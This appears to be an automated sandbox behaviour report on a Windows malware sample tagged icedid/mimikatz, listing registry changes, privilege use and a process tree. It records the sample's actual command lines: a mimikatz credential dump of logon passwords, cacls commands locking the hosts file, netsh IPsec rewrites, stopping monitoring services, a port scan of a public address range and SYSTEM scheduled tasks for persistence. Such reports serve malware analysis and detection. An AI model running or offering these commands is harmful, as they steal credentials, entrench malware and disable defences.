\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mesuau.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language yittybr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language yittybr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid Process 4108 cmd.exe 2252 PING.EXE -
NSIS installer 3 IoCs
Processes:
resource yara_rule behavioral2/files/0x0007000000023c9d-6.dat nsis_installer_2 behavioral2/files/0x0008000000023cb4-15.dat nsis_installer_1 behavioral2/files/0x0008000000023cb4-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 43 IoCs
Processes:
yittybr.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ yittybr.exe Key created \REGISTRY\USER\.DEFAULT\Software btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" yittybr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" yittybr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" yittybr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" yittybr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing yittybr.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump btjlhtrlh.exe -
Modifies registry class 14 IoCs
Processes:
yittybr.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ yittybr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ yittybr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" yittybr.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid Process 4988 schtasks.exe 4876 schtasks.exe 3104 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
yittybr.exepid Process 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe -
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid Process 660 660 660 660 660 660 660 660 660 660 660 660 660 660 660 -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
2024-11-14_7a5a1aad939d69699361d231cdc45e6a_hacktools_icedid_mimikatz.exepid Process 2536 2024-11-14_7a5a1aad939d69699361d231cdc45e6a_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
Processes:
2024-11-14_7a5a1aad939d69699361d231cdc45e6a_hacktools_icedid_mimikatz.exeyittybr.exeyittybr.exevfshost.exebtjlhtrlh.exettlnnh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exebtjlhtrlh.exedescription pid Process Token: SeDebugPrivilege 2536 2024-11-14_7a5a1aad939d69699361d231cdc45e6a_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 1316 yittybr.exe Token: SeDebugPrivilege 1848 yittybr.exe Token: SeDebugPrivilege 1236 vfshost.exe Token: SeDebugPrivilege 2936 btjlhtrlh.exe Token: SeLockMemoryPrivilege 2988 ttlnnh.exe Token: SeLockMemoryPrivilege 2988 ttlnnh.exe Token: SeDebugPrivilege 2616 btjlhtrlh.exe Token: SeDebugPrivilege 1316 btjlhtrlh.exe Token: SeDebugPrivilege 448 btjlhtrlh.exe Token: SeDebugPrivilege 4020 btjlhtrlh.exe Token: SeDebugPrivilege 4912 btjlhtrlh.exe Token: SeDebugPrivilege 1956 btjlhtrlh.exe Token: SeDebugPrivilege 1100 btjlhtrlh.exe Token: SeDebugPrivilege 4304 btjlhtrlh.exe Token: SeDebugPrivilege 3692 btjlhtrlh.exe Token: SeDebugPrivilege 2592 btjlhtrlh.exe Token: SeDebugPrivilege 404 btjlhtrlh.exe Token: SeDebugPrivilege 2372 btjlhtrlh.exe Token: SeDebugPrivilege 2064 btjlhtrlh.exe Token: SeDebugPrivilege 852 btjlhtrlh.exe Token: SeDebugPrivilege 3052 btjlhtrlh.exe Token: SeDebugPrivilege 1516 btjlhtrlh.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
2024-11-14_7a5a1aad939d69699361d231cdc45e6a_hacktools_icedid_mimikatz.exeyittybr.exeyittybr.exexohudmc.exemesuau.exeyittybr.exepid Process 2536 2024-11-14_7a5a1aad939d69699361d231cdc45e6a_hacktools_icedid_mimikatz.exe 2536 2024-11-14_7a5a1aad939d69699361d231cdc45e6a_hacktools_icedid_mimikatz.exe 1316 yittybr.exe 1316 yittybr.exe 1848 yittybr.exe 1848 yittybr.exe 4792 xohudmc.exe 64 mesuau.exe 644 yittybr.exe 644 yittybr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-11-14_7a5a1aad939d69699361d231cdc45e6a_hacktools_icedid_mimikatz.execmd.exeyittybr.execmd.execmd.exewpcap.exenet.exenet.exenet.exedescription pid Process procid_target PID 2536 wrote to memory of 4108 2536 2024-11-14_7a5a1aad939d69699361d231cdc45e6a_hacktools_icedid_mimikatz.exe 83 PID 2536 wrote to memory of 4108 2536 2024-11-14_7a5a1aad939d69699361d231cdc45e6a_hacktools_icedid_mimikatz.exe 83 PID 2536 wrote to memory of 4108 2536 2024-11-14_7a5a1aad939d69699361d231cdc45e6a_hacktools_icedid_mimikatz.exe 83 PID 4108 wrote to memory of 2252 4108 cmd.exe 86 PID 4108 wrote to memory of 2252 4108 cmd.exe 86 PID 4108 wrote to memory of 2252 4108 cmd.exe 86 PID 4108 wrote to memory of 1316 4108 cmd.exe 94 PID 4108 wrote to memory of 1316 4108 cmd.exe 94 PID 4108 wrote to memory of 1316 4108 cmd.exe 94 PID 1848 wrote to memory of 644 1848 yittybr.exe 96 PID 1848 wrote to memory of 644 1848 yittybr.exe 96 PID 1848 wrote to memory of 644 1848 yittybr.exe 96 PID 644 wrote to memory of 3512 644 cmd.exe 98 PID 644 wrote to memory of 3512 644 cmd.exe 98 PID 644 wrote to memory of 3512 644 cmd.exe 98 PID 644 wrote to memory of 4064 644 cmd.exe 99 PID 644 wrote to memory of 4064 644 cmd.exe 99 PID 644 wrote to memory of 4064 644 cmd.exe 99 PID 644 wrote to memory of 4272 644 cmd.exe 100 PID 644 wrote to memory of 4272 644 cmd.exe 100 PID 644 wrote to memory of 4272 644 cmd.exe 100 PID 644 wrote to memory of 4160 644 cmd.exe 101 PID 644 wrote to memory of 4160 644 cmd.exe 101 PID 644 wrote to memory of 4160 644 cmd.exe 101 PID 644 wrote to memory of 4952 644 cmd.exe 102 PID 644 wrote to memory of 4952 644 cmd.exe 102 PID 644 wrote to memory of 4952 644 cmd.exe 102 PID 644 wrote to memory of 4836 644 cmd.exe 103 PID 644 wrote to memory of 4836 644 cmd.exe 103 PID 644 wrote to memory of 4836 644 cmd.exe 103 PID 1848 wrote to memory of 4472 1848 yittybr.exe 107 PID 1848 wrote to memory of 4472 1848 yittybr.exe 107 PID 1848 wrote to memory of 4472 1848 yittybr.exe 107 PID 1848 wrote to memory of 5100 1848 yittybr.exe 109 PID 1848 wrote to memory of 5100 1848 yittybr.exe 109 PID 1848 wrote to memory of 5100 1848 yittybr.exe 109 PID 1848 wrote to memory of 2824 1848 yittybr.exe 111 PID 1848 wrote to memory of 2824 1848 yittybr.exe 111 PID 1848 wrote to memory of 2824 1848 yittybr.exe 111 PID 1848 wrote to memory of 1612 1848 yittybr.exe 115 PID 1848 wrote to memory of 1612 1848 yittybr.exe 115 PID 1848 wrote to memory of 1612 1848 yittybr.exe 115 PID 1612 wrote to memory of 3864 1612 cmd.exe 117 PID 1612 wrote to memory of 3864 1612 cmd.exe 117 PID 1612 wrote to memory of 3864 1612 cmd.exe 117 PID 3864 wrote to memory of 2588 3864 wpcap.exe 118 PID 3864 wrote to memory of 2588 3864 wpcap.exe 118 PID 3864 wrote to memory of 2588 3864 wpcap.exe 118 PID 2588 wrote to memory of 4412 2588 net.exe 120 PID 2588 wrote to memory of 4412 2588 net.exe 120 PID 2588 wrote to memory of 4412 2588 net.exe 120 PID 3864 wrote to memory of 1500 3864 wpcap.exe 121 PID 3864 wrote to memory of 1500 3864 wpcap.exe 121 PID 3864 wrote to memory of 1500 3864 wpcap.exe 121 PID 1500 wrote to memory of 3376 1500 net.exe 123 PID 1500 wrote to memory of 3376 1500 net.exe 123 PID 1500 wrote to memory of 3376 1500 net.exe 123 PID 3864 wrote to memory of 1444 3864 wpcap.exe 124 PID 3864 wrote to memory of 1444 3864 wpcap.exe 124 PID 3864 wrote to memory of 1444 3864 wpcap.exe 124 PID 1444 wrote to memory of 2348 1444 net.exe 126 PID 1444 wrote to memory of 2348 1444 net.exe 126 PID 1444 wrote to memory of 2348 1444 net.exe 126 PID 3864 wrote to memory of 2764 3864 wpcap.exe 127
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2084
-
C:\Windows\TEMP\lntjubmbe\ttlnnh.exe"C:\Windows\TEMP\lntjubmbe\ttlnnh.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2988
-
-
C:\Users\Admin\AppData\Local\Temp\2024-11-14_7a5a1aad939d69699361d231cdc45e6a_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-11-14_7a5a1aad939d69699361d231cdc45e6a_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\tllefmnq\yittybr.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4108 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2252
-
-
C:\Windows\tllefmnq\yittybr.exeC:\Windows\tllefmnq\yittybr.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1316
-
-
-
C:\Windows\tllefmnq\yittybr.exeC:\Windows\tllefmnq\yittybr.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:644 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3512
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:4064
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4272
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:4160
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4952
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:4836
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4472
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:5100
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2824
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1612 -
C:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exeC:\Windows\ppgkyibiq\ihnqsqiep\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3864 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4412
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:3376
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:2348
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:2764
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:3664
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:3900 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4244
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:2032
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:3676
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:836 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:744
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ppgkyibiq\ihnqsqiep\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:4508 -
C:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exeC:\Windows\ppgkyibiq\ihnqsqiep\bjfisnrbq.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ppgkyibiq\ihnqsqiep\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4564
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ppgkyibiq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ppgkyibiq\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2168 -
C:\Windows\ppgkyibiq\Corporate\vfshost.exeC:\Windows\ppgkyibiq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1236
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "yllebvbbl" /ru system /tr "cmd /c C:\Windows\ime\yittybr.exe"2⤵PID:3440
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:724
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "yllebvbbl" /ru system /tr "cmd /c C:\Windows\ime\yittybr.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3104
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "fmptikrhb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tllefmnq\yittybr.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:2800 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4428
-
-
